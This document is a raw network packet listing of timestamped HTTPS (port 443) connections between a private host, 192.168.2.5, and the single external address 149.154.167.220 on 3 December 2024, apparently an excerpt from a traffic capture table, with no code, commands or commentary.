Dec 3, 2024 14:28:36.800040960 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.800108910 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.800180912 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.800201893 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.800316095 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.800358057 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.847332954 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.848037958 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.848143101 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.848232985 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.848295927 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.848361015 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.857283115 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.857419014 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.857431889 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.857465029 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.857601881 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.857629061 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.862497091 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.862519026 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.862637043 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.862648010 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.863854885 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.868000984 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.868108988 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.868263006 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.868298054 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.868314028 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.868444920 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.868542910 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.868562937 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.873764992 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.874485970 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.874707937 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.874718904 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.874753952 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.874913931 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.874967098 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.875010014 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.875019073 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.875041008 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.875097990 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.895566940 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.895865917 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.895868063 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.895963907 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.896075964 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.896128893 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.896168947 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.896188974 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.896291971 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.915342093 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.916023016 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.916165113 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.916244984 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.916285038 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.916420937 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.916501045 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.943332911 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.963335037 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.963990927 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.964104891 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.964196920 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.964255095 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.964317083 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.981331110 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.995990038 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.996162891 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.996284962 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.996309042 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.996319056 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.996520996 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.996562004 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.996615887 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.996654987 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.996697903 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.997446060 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.997924089 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.997939110 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.998059034 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.998158932 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.998236895 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.998359919 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.998621941 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.998670101 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.039338112 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.039673090 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.039783955 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.039978027 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.040308952 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.040388107 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.087342024 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.087580919 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.087862968 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.088001013 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.088058949 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.088118076 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.088156939 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.098258972 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.116532087 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.116595984 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.116694927 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.116781950 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.116878033 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.116921902 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.116976023 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.117013931 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.117989063 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.118092060 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.118313074 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.118324995 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.118364096 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.118431091 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.118473053 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.118521929 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.118557930 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.119149923 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.119290113 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.119323015 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.119374037 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.119389057 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.119501114 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.119560957 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.119607925 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.120333910 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.120774031 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.120783091 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.120795012 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.120806932 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.120822906 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.120841026 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.120878935 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.121006012 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.121090889 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.121102095 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.121124983 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.121157885 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.121206045 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.121223927 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.121299982 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.121308088 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.121329069 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.121335983 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.121402979 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.157345057 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.157464027 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.157541990 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.157579899 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.157598019 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.157725096 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.157793999 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.157844067 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.157864094 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.158058882 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.199335098 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.199532032 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.237221003 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.237297058 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.237423897 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.237459898 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.237490892 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.237504959 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.237552881 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.239425898 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.239440918 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.239552021 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.239573956 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.239604950 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.239658117 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.239695072 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.241194963 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.241204977 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.241306067 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.241342068 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.241380930 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.241400957 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.242321968 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.242435932 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.242469072 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.242727041 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.242752075 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.243275881 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.243340015 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.243346930 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.243448973 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.243463993 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.243511915 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.243577003 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.243621111 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.243679047 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.243693113 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.243906021 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.244024992 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.244065046 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.244106054 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.244163990 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.244657993 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.244669914 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.244772911 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.244806051 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.244826078 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.244842052 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.244858980 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.244864941 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.244879961 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.244906902 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.244956017 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.244983912 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.245685101 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.245784998 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.245934010 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.245968103 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.246783018 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.246882915 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.246901989 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.246942043 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.246982098 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.247019053 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.247019053 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.247062922 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.247859955 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.247890949 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.248008013 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.248011112 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.248038054 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.274363995 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.274389982 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.274409056 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.274446964 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.274456978 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.274487019 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.274513006 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.274524927 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.274539948 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.274573088 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.279269934 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.279371977 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.279526949 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.279546022 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.279634953 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.279694080 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.279707909 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.279725075 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.279768944 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.279782057 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.279844046 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.279851913 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.327342033 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.358000994 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.358205080 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.358236074 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.358380079 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.358407974 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.359225988 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.359317064 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.359405041 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:37.359415054 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.361572027 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:37.364432096 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:39.640201092 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:39.640297890 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:39.640325069 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:39.640357018 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:39.640737057 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:39.640758991 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:39.800103903 CET	49875	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:39.800165892 CET	443	49875	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:39.800241947 CET	49875	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:39.800489902 CET	49875	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:39.800503016 CET	443	49875	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:40.258141994 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:40.258223057 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:40.258337021 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:40.258649111 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:40.258670092 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:40.382733107 CET	49879	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:40.382797003 CET	443	49879	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:40.382874966 CET	49879	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:40.383111000 CET	49879	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:40.383125067 CET	443	49879	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:41.169842005 CET	443	49875	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:41.170057058 CET	49875	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:41.170548916 CET	49875	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:41.170558929 CET	443	49875	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:41.170769930 CET	49875	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:41.170774937 CET	443	49875	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:41.170958042 CET	49875	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:41.170963049 CET	443	49875	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:41.789999008 CET	443	49879	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:41.790164948 CET	49879	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:41.800055027 CET	49879	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:41.800085068 CET	443	49879	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:41.800425053 CET	49879	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:41.800431967 CET	443	49879	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:41.800584078 CET	49879	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:41.800590038 CET	443	49879	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:41.936702013 CET	443	49875	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:41.936759949 CET	49875	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:41.936789036 CET	443	49875	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:41.936826944 CET	49875	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:41.936836958 CET	443	49875	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:41.936887980 CET	49875	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:41.938517094 CET	49875	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:41.938544035 CET	443	49875	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:42.433644056 CET	443	49879	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:42.433742046 CET	443	49879	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:42.433824062 CET	49879	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:42.434104919 CET	49879	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:42.434104919 CET	49879	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:42.747284889 CET	49879	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:42.747328043 CET	443	49879	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:43.733445883 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:43.733505011 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:43.733616114 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:43.733869076 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:43.733884096 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:44.724824905 CET	49889	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:44.724891901 CET	443	49889	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:44.724944115 CET	49889	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:44.725234032 CET	49889	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:44.725248098 CET	443	49889	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.189692974 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.189779043 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.190522909 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.190532923 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.190850973 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.190856934 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.191339016 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.191358089 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.191391945 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.191396952 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.191498041 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.191509962 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.191576958 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.191586971 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.191623926 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.191632986 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.191694021 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.191703081 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.191737890 CET	49884	443	192.168.2.5	149.154.167.220
